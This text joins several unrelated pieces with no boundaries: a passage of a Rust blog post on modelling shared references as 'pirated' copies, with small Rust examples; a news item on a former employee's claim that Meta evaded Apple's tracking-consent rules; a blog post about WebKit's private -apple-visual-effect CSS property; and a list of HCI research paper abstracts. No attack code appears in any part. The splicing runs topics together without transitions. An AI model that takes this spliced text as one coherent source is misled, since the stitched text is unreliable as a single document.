In a way, Rust's existing `Cell` works a bit like that too: you can think of it as storing a cell permission in a thread-local variable, taking it for the body of each method on `Cell` and returning it before the method exits. (This is the reason why you can't borrow a reference from the inside of a `Cell`: the cell wouldn't be able to return the permission to the thread-local variable while the permission was still needed to keep the reference alive.) Because the permissions are thread-local, you can't sync a `Cell` to another thread, because then both the old and new threads might be able to use their own permissions to access it at once. On this reasoning, `Cell` should be `Send` if it contains a `Send` type, but never `Sync` (and it does indeed have those specific trait implementations).
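You can check those implementations directly (this compiles as-is; the commented line wouldn't):

```rust
use std::cell::Cell;

fn assert_send<T: Send>() {}
fn assert_sync<T: Sync>() {}

fn main() {
    assert_send::<Cell<i32>>(); // ok: Cell<T> is Send when T is Send
    // assert_sync::<Cell<i32>>(); // error: Cell<i32> is never Sync
}
```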
Still, Rust's current `Cell` implementation is clearly not as powerful as the theory suggests it should be: even in current Rust, without scoped generics, it should be possible to represent a cell permission in the type system and use it to access cells which can't be proven accessible in other ways. This suggests that Rust is missing a feature; and although I can't find the feature in question in the Rust standard library, I was able to find it in a couple of places on crates.io: `ghost-cell` has an implementation backed by some formal logic proving that the idea is correct, and `qcell` has four different implementations, which differ in the arguments from uniqueness that they use to generate the cell permission in the first place. So it seems like such a feature reasonably could/should exist in the language.
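To make the "cell permission" idea concrete, here's a minimal sketch of a singleton-token cell (inspired by the general approach qcell takes, but illustrative rather than that crate's actual API): the token is the argument from uniqueness, and borrowing it stands in for borrowing the cell contents.

```rust
use std::cell::UnsafeCell;
use std::sync::atomic::{AtomicBool, Ordering};

// Only one Token can ever be created, so a &mut Token proves that no other
// borrow derived from the token is alive.
static TOKEN_TAKEN: AtomicBool = AtomicBool::new(false);

struct Token { _private: () }

impl Token {
    fn new() -> Option<Token> {
        // Only the first call ever succeeds.
        if TOKEN_TAKEN.swap(true, Ordering::SeqCst) {
            None
        } else {
            Some(Token { _private: () })
        }
    }
}

struct PermCell<T>(UnsafeCell<T>);

impl<T> PermCell<T> {
    fn new(value: T) -> Self { PermCell(UnsafeCell::new(value)) }

    // Reading needs only a shared borrow of the token: reads may alias.
    fn get<'a>(&'a self, _token: &'a Token) -> &'a T {
        unsafe { &*self.0.get() }
    }

    // Writing needs the unique borrow: the borrow checker then proves that
    // no read borrowed from the token is still alive.
    fn set(&self, _token: &mut Token, value: T) {
        unsafe { *self.0.get() = value; }
    }
}

fn main() {
    let mut token = Token::new().expect("token already taken");
    let cell = PermCell::new(1);
    cell.set(&mut token, 2);
    println!("{}", *cell.get(&token));
}
```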
Another interesting observation about arguments from uniqueness: normally, such
arguments can be used to justify writes; but if you pirate one of them, it can
no longer make writes safe because it might conflict with a pirated copy of
itself. However, the pirated proof still proves that there are no conflicting
writes (because pirating it prevents it being used for writing but doesn't give
anything else the ability to write), and thus it makes reads safe. So this
gives, in a sense, a mathematical justification for why shared references work
to make reading safe: extra justification for that probably wasn't needed, but
it was still a little surprising (and somewhat mathematically elegant) to see
such a justification turn up.
Unfortunately, I wasn't able to conclude much more from the "something that maps T to U can map ?T to ?U if all its resources are `Copy`" rule. The rule feels as though, in Rust, it wants to operate by updating every pirated copy of the object simultaneously, but even if that would be sound, it would be impossible to implement due to not tracking where the copies actually are.
There is another ?-related rule in linear logic: ??T is the same as ?T. Although that one's almost degenerate in linear logic, it's interesting in the context of Rust because it effectively makes pirating more transparent than referencing: in Rust, `T`, `&T` and `&&T` can all have different trait implementations, whereas the fact that `?T` and `??T` are the same means that it's hard to distinguish between `U` and `?U` in traits that are generic over `U` (because `U` might be `?T`).
This means that some trait implementations get weirder. Logically, you would want pirated copies of objects to implement pirated copies of their traits (the most obvious example in this direction is that pirating `DerefMut` gives you `Deref`). But going down this line tears `Clone` in two different directions: one wants to be consistent with `Copy`, cloning a `?T` as a different `?T` by copying it, and the other wants to clone a `?T` as a `T` (but also wants to clone a `??T` as a `T`, not a `?T`). And weirdly, it turns out that the Rust library team has already accepted an API change proposal to add the second of these traits (one that clones a `?T` as a `T`), calling it `CloneFromCopy`, which is particularly strange given that current Rust doesn't even have a pirating operator – I was unaware of the trait in question before I started writing this blog post, and only coincidentally learned about it while doing something unrelated. (The details are in this GitHub issue: the idea of `CloneFromCopy` was discovered in the process of trying to implement a way to safely clone out of a `Cell`.)
Despite this weirdness, it definitely feels like a version of Rust that's based on pirating and mutable references, rather than on shared references and mutable references (with `&T` being sugar for `?&mut T`), should be viable: I can think in pirated Rust and it seems to logically hang together (both in terms of the linear logic behind it and in terms of what the language can and can't do). Having three sorts of reference-like things (mutable references, shared references, pirated copies) rather than two might make finding a good syntax hard, but hopefully that would be a resolvable problem. In most ways, the language seems somewhat superior to current Rust, in that it doesn't force you to create a reference merely to be able to share something (for many types, the reference just adds an extra layer of indirection for no benefit), and doesn't force you to write both shared and mutable versions of almost every method: and it would be a superset of current Rust, in that you can implement shared references in it, so you get all the functionality of current Rust in addition to pirating.
Another interesting data point: I've been considering writing my own practical programming language for a while, and part of the process of planning involved thinking about what sort of memory model I wanted it to have (in many cases, by thinking about programs I wanted to write and what sort of primitives I would need to be able to write them). Although I started mostly from scratch, the three "main" ways to pass arguments ended up corresponding fairly closely to Rust's (`T`, `&T`, `&mut T`) – except that the `&T` was a little different, and thinking about it in retrospect, what I came up with was `?T` rather than `&T`. (The planning was quite prescient in that it also ended up with an equivalent of scoped generics, with very different syntax but the same semantics.)
Unfortunately, it's almost certainly too late to switch Rust to be based on
pirating rather than shared references at this point; there's likely a lot of
unsafe code that makes assumptions that are true in current Rust but become
false with pirating, you'd want to redesign a lot of standard APIs to use
pirated copies rather than shared references, some very core traits would start
working slightly differently, and all the existing tutorials would go out of
date: it'd be a very wide-reaching change.
Still, even if it's too late to make this large a change to Rust as a whole,
maybe it isn't too late to learn some lessons from the thought-experiment
version of Rust, and find some features that are missing from the real version.
What pirating teaches us about Rust
Shares of reference-counted references
The most obvious place to look for missing features in current Rust is by
pirating its existing reference types. After all, this blog post managed to
recreate Rust shared references by starting with Rust mutable references and
pirating them: so maybe something interesting happens if we pirate some other
sort of reference?
And indeed, a missing feature turns up almost immediately: just consider `?'a Rc<T>` or `?'a Arc<T>`. The semantics of these are fairly easy to explain: they're created from an existing `Rc`/`Arc` (i.e. one of the potentially many references to a reference-counted object), assert that that particular reference they were created from won't be dropped during the lifetime `'a`, and can be freely cloned during that lifetime without actually needing to change the reference count (making the clones more efficient). The advantage over `&'a Rc<T>`/`&'a Arc<T>` is that it saves a level of indirection, leading to simpler code (especially in the generated executable); the advantage over `&'a T` is that you can use it to clone the underlying `Rc`/`Arc`, even with a lifetime that extends beyond `'a`; and the advantage over `Rc`/`Arc` is that it cuts down on reference count updates, which can be really slow (especially with `Arc` – it uses atomic read-modify-write operations, which are some of the slowest instructions typical processors have – but even `Rc` needs to guard against the reference count overflowing, and the overflow checks usually make reference count increments and decrements impossible to optimise out).
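A minimal sketch of the idea in current Rust, in the spirit of the rc-borrow crate (the names and details here are illustrative, not that crate's actual API):

```rust
use std::marker::PhantomData;
use std::ops::Deref;
use std::rc::Rc;

// A ?'a Rc<T>: valid while the Rc it came from is borrowed for 'a.
struct RcShare<'a, T> {
    target: &'a T,                  // the T inside the Rc's allocation
    _proof: PhantomData<&'a Rc<T>>, // the Rc it came from outlives 'a
}

// Manual impls: the share is freely copyable even when T itself isn't.
impl<'a, T> Clone for RcShare<'a, T> {
    fn clone(&self) -> Self { *self }
}
impl<'a, T> Copy for RcShare<'a, T> {}

impl<'a, T> RcShare<'a, T> {
    fn new(rc: &'a Rc<T>) -> Self {
        RcShare { target: &**rc, _proof: PhantomData }
    }

    // Clone the underlying Rc, with a lifetime extending beyond 'a: the
    // only point where the reference count gets touched.
    fn upgrade(self) -> Rc<T> {
        let ptr: *const T = self.target;
        // Safety assumption: ptr is the address of the value inside an Rc
        // allocation that is kept alive (borrowed) for all of 'a.
        unsafe {
            Rc::increment_strong_count(ptr);
            Rc::from_raw(ptr)
        }
    }
}

impl<'a, T> Deref for RcShare<'a, T> {
    type Target = T;
    fn deref(&self) -> &T { self.target }
}

fn main() {
    let rc = Rc::new(String::from("shared"));
    let share = RcShare::new(&rc);
    let share2 = share; // a free copy: no reference count update
    println!("{} {}", *share, *share2);
    let rc2 = share2.upgrade(); // one refcount bump
    drop(rc);
    println!("{}", *rc2);
}
```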
The `?Rc<T>` and `?Arc<T>` types seem to be missing from the Rust standard library, but I found them in a couple of crates on crates.io: `rc-borrow` is a direct implementation of them, but is hardly used; and `triomphe` implements the equivalent for its own `Arc` implementation. My guess is that although the feature in question is a clear improvement over the alternatives in the case where you need it, it isn't enough of an improvement to be worth adding a dependency (dependencies have a substantial cost of their own, so you don't want to add one unless you see a comparable gain).
Why shallow snapshots don't work
A different way in which pirating might seem useful is to create a "snapshot" of a value: it at first seems like it might be useful to take a copy of something so that you can safely use it after the original changes. But one lesson I learned from pirating all those reference types was that this sort of copy has similar safety rules to a shared reference: it has a lifetime, and you can't change the original until the lifetime is over. In this situation, you really need a clone (cloning deeply if that's how the type's `Clone` implementation works), rather than a shallow copy; otherwise, if the original is modified or dropped, that might cause something owned by the original to be dropped, leaving a dangling reference in the copy. (While writing this paragraph, I realised that `CloneFromCopy` had exactly this issue and thus was unsound, and the design was changed as a consequence. Although I was hoping to learn lessons about Rust from the experiment into pirating, I wasn't expecting them to be so immediately practically relevant!)
Trait implementations on references
The whole `Clone` versus `CloneFromCopy` thing got me thinking about how trait implementations interact with references more generally. It feels like Rust "wants" to, in general, make references implement the same traits as the things that they reference (and the "??T is ?T" equivalence provides an argument that something like that should be expected) – although with shared references, you get a "read only" version of the trait (because a shared reference is a pirated mutable reference, and pirating an object gives you a read-only version of its traits). In particular, it's rare for both the reference and the referenced object to implement the same trait differently.
There are a couple of notable exceptions: `Clone` and `Debug` both make sense at different abstraction levels (you can clone an `Rc<T>` or you can clone the `T` inside it; and you can get debugging details either for the referenced object or for the reference itself). But the interesting thing here is that the two cases seem to differ. When cloning, usually you want to clone the reference, because it's usually either cheaper than, or entirely equivalent to, cloning the object (although if you specifically need a deep copy of an interior-mutable object, you need to clone the object itself rather than a reference wrapping it). When you're debugging code, normally you care about debugging the referenced object rather than the reference itself.
Rust defaults to taking the trait implementation from the reference, which makes `<Rc as Clone>::clone()` work correctly – but it would "naturally" make `Debug` give the wrong behaviour. As such, reference types are normally implemented to just copy the results of `Debug` on the inner value: but that means that you can't debug a reference (which is annoying when you're writing your own custom reference types). It also becomes a little incoherent sometimes: one of the references I wrote was basically a "proof that a `MaybeUninit` is initialised, plus a reference to the value inside it", and it wraps a reference to the `MaybeUninit`. If the inside value is `Debug`, by Rust's normal rules the reference's `Debug` implementation should delegate to that, but that means manually overriding the inside reference's `Debug` (which can't get at the referenced object because it doesn't know whether the memory it points to is initialised). If it isn't, then it would be nice to be able to `Debug` the inside reference instead: but that would be incoherent. This sort of thing makes me think that at least `Debug` (and possibly also `Clone`) is probably defined incorrectly (in particular, I am wondering whether it would make more sense if `Debug` on a reference debugged the reference itself, but the `{:?}` format specifier applied `Deref` as many times as possible before using the `Debug` implementation, with a separate format specifier available to use `Debug` directly).
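The current default is easy to demonstrate: the `Debug` implementations on references just delegate inwards, so the references themselves are invisible to `{:?}`.

```rust
fn main() {
    let x = 42;
    let r = &x;
    let rr = &r;
    // All three print `42`: &T and &&T forward Debug to T, so there's no
    // way to ask {:?} about the references themselves.
    println!("{:?} {:?} {:?}", x, r, rr);
}
```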
Packed types
Another topic which can usefully be thought about in terms of pirating is that of packed or bit-packed types. Most types in Rust have an alignment of more than 1, which means that pointers to them don't use all the bits of their storage (the lowest bit is always 0). Suppose you have an `enum` like this (this example is similar to something that came up in a program I was writing recently):
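Something along these lines (the exact `Branch` payload here is a guess for illustration; the point is that both variants hold a reference with alignment 8):

```rust
enum Tree<'a> {
    Leaf(&'a u64),
    Branch(&'a [Tree<'a>; 2]),
}
```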
Presently, Rust will store this using an amount of memory that's twice the size of a pointer; for example, on a 64-bit system, it will use 64 bits to store the reference (with 3 of those bits always being 0), and another 64 bits to store the leaf/branch status (there is no gain from using fewer, because the `Tree` structure needs to have a size that's a multiple of 64 bits). It would obviously be much more memory-efficient to store this in half the size, by (e.g.) flipping the bottom bit of a `Leaf` reference so that it could be distinguished from a `Branch` reference; this is a "bit-packed" type because it's packing extra data into one of the known bits of a field.
The issue with packed and bit-packed types is that it's very difficult to use them soundly. A reference is supposed to point to memory that contains a value of the correct type: but (e.g.) if you tried to form a reference to the field of a `Leaf`, the memory it was pointing to would not contain a `&'a u64` like it was supposed to, but rather a "`&'a u64` with the bottom bit flipped" (which is not the same type because its memory representation is different). Rust's current solution to this sort of problem is "you have to move or copy the value out of the packed type before you can do anything with it". That works in the case of `Tree` above, because `&'a u64` is `Copy` and so you can copy it out of the packed type freely.
What about packed types whose fields aren't `Copy`? In present Rust, they're almost completely unusable (you have to entirely destructure the type in order to do anything with its contents), because you can't copy the fields. However, rather than copying, what about pirating the fields? That gives you a little less power than copying or forming a reference would (e.g. you don't get to mutate the resulting value with interior mutability), but there are still a lot of things you can soundly do with it (and having a theory of pirating helps to clarify what those are). Without pirating existing as a language feature in Rust, the compiler won't be able to help you use packed fields directly; but it's still possible to use the theory to analyse unsafe code that does the same thing, and get a quick idea of whether it's likely to be sound or not. This line of reasoning also implies that adding a pirating operation to Rust might be beneficial even if it isn't used pervasively throughout the API; it would still be useful for forming "references" to packed fields.
The case for pirating in Rust
Normally I like to end blog posts with a conclusion. But in this case, the situation is more like "I had an idea, experimented with it, learned a lot of new things as a result, and it just led to more ideas – but I don't know whether they're good ideas and haven't formed an opinion on them". Sometimes (as with scoped generics) doing research leads to a conclusion, a thesis you can argue and try to convince other people of; and then you get a nice, self-contained blog post. But sometimes, rather than a thesis, you just end up with more questions: and that sort of result can also be useful in its own way.

So instead of a conclusion, I'm going to finish by arguing one side of a debate: presenting a list of arguments that maybe adding pirating to Rust would actually be a good idea after all. I haven't yet decided whether or not it would make a good addition to the existing language; I am pretty sure I would add it if I were redoing Rust from scratch, but the trade-offs for changing an existing language are much larger. I think the downsides are obvious; but the upsides (and arguments against the downsides) are much more interesting, and there are more of them than I expected, so I'm going to write them out and let readers make up their own minds.
A key observation is that the only observable difference between a pirated value
and a shared reference to the original value is that the shared reference
preserves the address. (You can convert a pirated value to a "shared reference
but with the wrong address" by storing it in memory, then reinterpreting a
pointer to it as a reference – Rust's code generation back-end already does that
sort of thing automatically when passing a sufficiently large value to a
function, so passing a large pirated value and passing a shared reference to
that value are actually very similar from the point of view of the generated
code.) That means that a pirating operation can alternatively be viewed as a
"shared reference, but you don't do anything that depends on its address"
operation (the main things this rules out are converting it to a pointer, and
writing through it using interior mutability).
Rust's type system already tracks whether or not a reference is to a type with
interior mutability, so the difficult part is working out whether or not a
shared reference is ever converted to a pointer. This is a great time to deploy
another lesson about adding features to a language: if the feature is something
fundamental and important, you should be able to find individual uses or special
cases of it in the compiler already (e.g. one of the things that helped convince
me that scoped generics were the right design is that lifetimes are a special
case of them, so they just generalise something that Rust already needed). In
this case, the goal is to look for situations where the compiler is checking to
see if a shared reference ever gets converted to a pointer, and acting
differently based on whether it is or isn't.
And unsurprisingly, such situations do exist. The most important is in the compiler back-end: one of the things Rust's back-end, LLVM, does is look for functions that take shared references to small values and never use the address, and convert them to take the value directly: in other words, it optimises referencing into pirating. Almost every nontrivial Rust program requires this optimisation to avoid losing performance, because there are a lot of standard library methods that take `&T` purely because they need to share the value, not because they need the address. So Rust is implementing a sort of "pirating inference": the lack of pirating in the language itself means that a literal compilation of the code would be slower than in other systems programming languages, and inferring pirating back into the program is used to regain the performance.
This leads to a lot of complexity that doesn't inherently need to exist; and forcing programmers to write simple code (pass by value) as something complex (pass by shared reference), then optimising it back into the simple version, is normally considered an anti-pattern. In this case, it's happening because current Rust conflates the parameter-passing method (by-value or by-address) with the sharing rules (shared or exclusive). The complexity has practical downsides, too: if the inference goes wrong (e.g. due to optimiser bugs), you can end up with a program that's much slower than it should be (and such bugs are probably fairly common: it didn't take me long to find a recent such bug, and the comments on it even discuss the issues with capturing a small value by reference when it could have been captured by value). The complexity also likely slows down the compiler somewhat, because there are so many references that need to be optimised out, and removing them is likely to take substantial time.
It turns out that knowing whether a reference is ever used as a pointer is useful for more than optimisations, too. Programs that mix Rust code with code in other languages often benefit from security mitigations, due to scenarios like "the Rust code creates a buffer and gives a pointer to it to the C code, and then the C code overflows it": if a pointer to a Rust buffer can escape to C code, it improves security to have the compiled Rust code insert checks to see whether the memory immediately after the buffer was overwritten, before it tries to do anything critical with the memory further beyond. But too many checks can hurt performance. As such, it has been proposed that the Rust compiler should insert such checks only for buffers for which a reference is ever converted to a pointer: in other words, this is another case where the compiler wants to act differently based on whether a reference is truly being used as a reference, or whether it's just being used to simulate pirating.
Trying to work out this sort of information by using a static analysis on every compile is inherently somewhat slow: the analysis could be skipped if information about the "reference used as pointer" status instead existed in the program, so it seems like something that, ideally, should be handled in the type system. As it happens, most Rust crates never actually need to convert shared references to pointers (even crates that use low-level unsafe code usually do it by storing pointers and converting them to references, rather than the other way round). So it's possible to imagine, e.g., a crate attribute that says "this crate doesn't do any shared-reference-to-pointer conversions" (perhaps accompanied by a separate type that represents a shared reference that can be converted to a pointer, although in a pinch you could use a shared reference to a mutable reference, `& &mut`). If a whole crate graph sets the attribute, then the Rust compiler would be able to take the relevant information directly from the type system, and not need to do a slow and error-prone static analysis (and if a crate didn't set the attribute, you could fall back to the old method of doing things). Perhaps it could even be made the default in a future edition of Rust.
And that seems like it would be a fairly small change. But once it had been made, you would have pirating in Rust: for `T` without interior mutability, `&T` would now have the semantics of pirating (with the compiler being able to freely choose between pass-by-value, pass-by-address, and pass-by-address-of-copy depending on which was most efficient). It wouldn't be a "perfect" implementation (e.g. `&T` and `&&T` would still be different types, and you would occasionally need a `*` in the source code even in cases where it doesn't correspond to an actual pointer dereference): but it would have the huge advantage of being consistent with how current Rust works, meaning that the existing tutorials would still work and programmers in general wouldn't need retraining.
There might even be a way to get benefits like "you can take references to
packed fields now" (implemented as a copy, then either passing around the copy
or a pointer to it), although that seems like it would probably be out of reach
because it would stop working if someone added a dependency on an old crate that
used the old, address-carrying definition of shared references.
So it seems like a world where pirating is added to Rust itself might actually be viable: it would have lower upsides than the "everything is written in terms of pirating now" world, but also lower downsides (and many programmers might not even notice the change). It might be interesting to implement it experimentally and see what the impact on compile times is like!

And even if it does turn out that adding pirating to Rust isn't worthwhile, we've still learnt a lot from the experiment: hints on how to write custom references, thoughts about the traits system, a suggestion to add shares of `Rc` and `Arc`, a bug caught, and a mathematical model of shared references that uses a part of linear logic that previously didn't seem useful. It's been fun.

Perhaps I can go back to my experiment in implementing scoped generics now!
Meta bypassed Apple privacy protections, claims former employee
A former Meta product manager has claimed that the social network circumvented Apple's privacy protections, as well as cheating advertisers, and fired him when he repeatedly raised the issue internally.

Meta is said to have found ways to identify Apple users even after they refused consent for app tracking, in order to avoid an estimated $10 billion loss of revenue…
Meta relied heavily on selling personalized advertising, which required it to be able to target particular demographics and interest groups. This was achieved by tracking individual users across different apps.
Apple's App Tracking Transparency (ATT) was introduced in 2021 and meant that companies required user permission in order to carry out this tracking. Unsurprisingly, the vast majority of users declined.
It was estimated at the time that this would cost social media companies many billions of dollars, and Meta's CFO warned investors that its own loss would be around $10B per year.
A fired product manager at the company, Samujjal Purkayastha, has now taken his case to an employment tribunal claiming he was unlawfully dismissed for raising concerns about the practice, reports the Financial Times.
Meta secretly linked user data with other information to track users’ activity on other websites without their permission — despite Apple in 2021 introducing measures explicitly requiring consent, according to Purkayastha’s filings […]
A “closed and secretive” team at Meta is alleged to have used “deterministic matching” — gathering identifiable information that could then be used to connect data across multiple platforms in violation of Apple’s new privacy policies.
He also accuses Meta of inflating the value of sales achieved by advertising on its platforms.
Meta denies any wrongdoing, and claims that Purkayastha was dismissed for unrelated reasons. The tribunal was unable to rule immediately, and said a full hearing will be held later in the year.
I have an incredibly boring summer hobby: looking at the changelog for the WebKit Github repo. Why? Because I spend a chunk of my professional life working with webviews inside mobile apps and I like to get an early peek into what's coming in the next version of iOS. Since Tim Cook has yet to stand up at WWDC and announce "one more thing... Service Worker support in WKWebView, provided you add the correct entry to the WKAppBoundDomains array in your Info.plist" (and you know what, he should), manual research is the order of the day.
So I was really interested to see, the day after WWDC finished, a pull request named:
Liquid Glass was one of the big takeaways from 2025's WWDC. Probably the biggest change in iOS UI since iOS 7 ditched the skeuomorphic look of the past. But that's all native UI, what does any of that have to do with webviews?
A poke around the context of the PR revealed something really interesting: Apple has a custom CSS property named -apple-visual-effect. Not only does it allow the use of Liquid Glass in iOS 26 (via values like -apple-system-glass-material) but all versions support using standard materials with values like -apple-system-blur-material-thin.
Yes it works and no, we can't
Before you, like me, fire up Safari and start editing some CSS, I have bad news: no, it doesn't work on the web. As well it shouldn't. But it also doesn't work by default in an app using WKWebView: you have to toggle a setting in WKPreferences called useSystemAppearance... and it's private. So if you use it, say goodbye to App Store approval.
I wanted to try it out all the same so I hacked around to set useSystemAppearance to true, set my CSS to:
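(The actual CSS is shown as a screenshot in the post; reconstructing from the values named above, it would be something like the following, with the selector being my guess.)

.map-overlay {
  /* Private Apple-only property; only honored in a WKWebView with the
     private useSystemAppearance preference enabled. */
  -apple-visual-effect: -apple-system-blur-material-thin;
}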
With thanks to MapboxGL JS for the beautiful background
Whoever it was at Apple that decided to make this a CSS property is a genius because it makes it incredibly easy to provide different rules based on Liquid Glass support:
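(The post's snippet here is also an image; the rules would look something like this, with a selector of my own choosing.)

/* Fallback for older iOS versions: a standard blur material. */
.map-overlay {
  -apple-visual-effect: -apple-system-blur-material-thin;
}

/* Where WebKit recognizes the iOS 26 value, use Liquid Glass instead. */
@supports (-apple-visual-effect: -apple-system-glass-material) {
  .map-overlay {
    -apple-visual-effect: -apple-system-glass-material;
  }
}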
It's an interesting piece of trivia but no-one outside of Apple can use it. So what does it matter? It doesn't. Except for the implication for what I'll call Alastair's Grand Theory of In-App Webviews. Industry wide they don't have a great reputation. But my suggestion is this:
the main reason webviews in apps have such a bad reputation is because you don't notice the webviews that are integrated seamlessly.
It stands to reason that Apple wouldn't have developed this feature if they weren't using it. Where? We have no idea. But they must be using it somewhere. The fact that none of us have noticed exactly where suggests that we're interacting with webviews in our daily use of iOS without ever even realising it.
Nowadays, electric guitars are often used together with digital interfaces. For instance, tablature applications can support guitar practice by rendering and playing back the tabs of individual instrument tracks of a song (guitar, drums, etc.). However, those interfaces are typically controlled via mouse and keyboard or via touch input. This means that controlling and configuring playback during practice can lead to high switching costs, as learners often need to switch between playing and interface control. In this paper, we explore the use of audio input from an unmodified electric guitar to enable interface control without letting go of the guitar. We present GuitarPie, an audio-based pie menu interaction method. GuitarPie utilizes the grid-like structure of a fretboard to spatially represent audio-controlled operations, avoiding the need to memorize note sequences. Furthermore, we implemented TabCtrl, a tablature interface that uses GuitarPie and other audio-based interaction methods for interface control.
ACM UIST 2024
Andreas Fender, Mohamed Kari
Digital pen input devices based on absolute pen position sensing, such as a Wacom pen, support high-fidelity pen input. However, they require specialized sensing surfaces like drawing tablets, which can have a large desk footprint, constrain the possible input area, and limit mobility. In contrast, digital pens with integrated relative sensing enable mobile use on passive surfaces, but suffer from motion artifacts or require surface contact at all times, deviating from natural pen affordances. We present OptiBasePen, a device for mobile pen input on ordinary surfaces. Our prototype consists of two parts: the "base" on which the hand rests and the pen for fine-grained input. The base features a high-precision mouse sensor to sense its own relative motion, and two infrared image sensors to track the absolute pen tip position within the base's frame of reference. This enables pen input on ordinary surfaces without external cameras while also avoiding drift from pen micro-movements. In this work, we present our prototype as well as the general base+pen concept, which combines relative and absolute sensing.
ACM UIST 2023
Andreas Fender, Derek Alexander Witzig, Max Moebus, Christian Holz
When learning to play an instrument, it is crucial for the learner's muscles to be in a relaxed state when practicing. Identifying which parts of a song lead to increased muscle tension requires self-awareness during an already cognitively demanding task. In this work, we investigate unobtrusive pressure sensing for estimating muscle tension while practicing songs with the guitar. First, we collected data from twelve guitarists. Our apparatus consisted of three pressure sensors (one on each side of the guitar pick and one on the guitar neck) to determine the sensor that is most suitable for automatically estimating muscle tension. Second, we extracted features from the pressure time series that are indicative of muscle tension. Third, we present the hardware and software design of our PressurePick prototype, which is directly informed by the data collection and subsequent analysis.
ACM CHI 2023
Andreas Fender, Thomas Roberts, Tiffany Luong, Christian Holz
Digital painting interfaces require an input fidelity that preserves the artistic expression of the user. Drawing tablets allow for precise and low-latency sensing of pen motions and other parameters like pressure to convert them to fully digitized strokes. A drawback is that those interfaces are rigid. While soft brushes can be simulated in software, the haptic sensation of the rigid pen input device is different compared to using a soft wet brush on paper. We present InfinitePaint, a system that supports digital painting in Virtual Reality on real paper with a real wet brush. We use special paper that turns black wherever it comes into contact with water and turns blank again upon drying. A single camera captures those temporary strokes and digitizes them while applying properties like color or other digital effects. We tested our system with artists and compared the subjective experience with a drawing tablet.
ACM UIST 2022
Guy Luethi, Andreas Fender, Christian Holz
We present DeltaPen, a pen device that operates on passive surfaces without the need for external tracking systems or active sensing surfaces. DeltaPen integrates two adjacent lens-less optical flow sensors at its tip, from which it reconstructs accurate directional motion as well as yaw rotation. DeltaPen also supports tilt interaction using a built-in inertial sensor. A pressure sensor and high-fidelity haptic actuator complements our pen device while retaining a compact form factor that supports mobile use on uninstrumented surfaces. We present a processing pipeline that reliably extracts fine-grained pen translations and rotations from the two optical flow sensors. To asses the accuracy of our translation and angle estimation pipeline, we conducted a technical evaluation in which we compared our approach with ground-truth measurements of participants' pen movements during typical pen interactions. We conclude with several example applications that leverage our device's capabilities. Taken together, we demonstrate novel input dimensions with DeltaPen that have so far only existed in systems that require active sensing surfaces or external tracking.
ACM CHI 2022
(Best paper award)
Andreas Fender, Christian Holz
Mixed Reality is gaining interest as a platform for collaboration and focused work to a point where it may supersede current office settings in future workplaces. At the same time, we expect that interaction with physical objects and face-to-face communication will remain crucial for future work environments, which is a particular challenge in fully immersive Virtual Reality. In this work, we reconcile those requirements through a user's individual Asynchronous Reality, which enables seamless physical interaction across time. When a user is unavailable, e.g., focused on a task or in a call, our approach captures co-located or remote physical events in real-time, constructs a causality graph of co-dependent events, and lets immersed users revisit them at a suitable time in a causally accurate way. Enabled by our system AsyncReality, we present a workplace scenario that includes walk-in interruptions during a person's focused work, physical deliveries, and transient spoken messages. We then generalize our approach to a use-case agnostic concept and system architecture. We conclude by discussing the implications of an Asynchronous Reality for future offices.
ACM CHI 2021
Andreas Fender, Diego Martinez Plasencia, Sriram Subramanian
Acoustic levitation is gaining popularity as an approach to create physicalized mid-air content by levitating different types of levitation primitives. Such primitives can be independent particles or particles that are physically connected via threads or pieces of cloth to form shapes in mid-air. However, initialization (i.e., placement of such primitives in their mid-air target locations) currently relies on either manual placement or specialized ad-hoc implementations, which limits their practical usage. We present ArticuLev, an integrated pipeline that deals with the identification, assembly and mid-air placement of levitated shape primitives. We designed ArticuLev with the physical properties of commonly used levitation primitives in mind. It enables experiences that seamlessly combine different primitives into meaningful structures (including fully articulated animated shapes) and supports various levitation display approaches (e.g., particles moving at high speed). In this paper, we describe our pipeline and demonstrate it with heterogeneous combinations of levitation primitives.
Storyboard of video by Christian Holz
IEEE VR 2021
Manuel Meier, Paul Streli, Andreas Fender, Christian Holz
In this paper, we bring rapid touch interaction on surfaces to Virtual Reality. Current systems capture input with cameras, for which touch detection remains a core challenge, often leaving free-hand mid-air interaction and controllers as viable alternatives for input. We present TapID, a wrist-based system that complements optical hand tracking with inertial sensing to detect touch events on surfaces - the input modality that users have grown used to on phones and tablets. TapID embeds a pair of inertial sensors in a flexible strap, one at either side of the wrist; from the combination of registered signals, TapID reliably detects surface touch events and, more importantly, identifies the finger used for touch, which we fuse with optically tracked hand poses to trigger input in VR. We evaluated TapID in a series of user studies on event-detection accuracy (F1 = 0.997) and finger-identification accuracy (within-user: F1 = 0.93; cross-user: F1 = 0.91 after 10 refinement taps and F1 = 0.87 with no refinement) in a seated table scenario. We conclude with a series of applications that complement hand tracking with touch input, including UI control, rapid typing, and surface gestures.
Video edited by Hugo Romat
IEEE VR 2021
Hugo Romat, Andreas Fender, Manuel Meier, Christian Holz
Digital pen interaction has become a first-class input modality for precision tasks such as writing, annotating, and drawing. In Virtual Reality, however, input is largely detected using cameras which does not nearly reach the fidelity we achieve with analog handwriting or the spatial resolution required to enable fine-grained on-surface input.
We present FlashPen, a digital pen for VR whose sensing principle affords accurately digitizing hand-writing and fine-grained 2D input for manipulation. We combine absolute camera tracking with relative motion sensing from an optical flow sensor. In this paper, we describe our prototype, a user study and several application prototypes.
ACM ISS 2019
(Best application paper award)
Joao Belo, Andreas Fender, Tiare Feuchtner, Kaj Groenbaek
We present a digital assistance approach for applied metrology on near-symmetrical objects. In manufacturing, systematically measuring products for quality assurance is often a manual task, where the primary challenge for the workers lies in accurately identifying positions to measure and correctly documenting these measurements. This paper focuses on a use-case, which involves metrology of small near-symmetrical objects, such as LEGO bricks. We aim to support this task through situated visual measurement guides. Aligning these guides poses a major challenge, since fine grained details, such as embossed logos, serve as the only feature by which to retrieve an object's unique orientation. We present a two-step approach, which consists of (1) locating and orienting the object based on its shape, and then (2) disambiguating the object's rotational symmetry based on small visual features. We apply and compare different deep learning approaches and discuss our guidance system in the context of our use case.
ACM ISS 2019
Andreas Fender, Joerg Mueller
We present SpaceState, a system for designing spatial user interfaces that react to changes of the physical layout of a room. SpaceState uses depth cameras to measure the physical environment and allows designers to interactively define global and local states of the room. After designers defined states, SpaceState can identify the current state of the physical environment in real-time. This allows applications to adapt the content to room states and to react to transitions between states. Other scenarios include analysis and optimizations of work flows in physical environments. We demonstrate SpaceState by showcasing various example states and interactions. Lastly, we implemented an example application: A projection mapping based tele-presence application, which projects a remote user in the local physical space according to the current layout of the space.
ACM ISS 2018
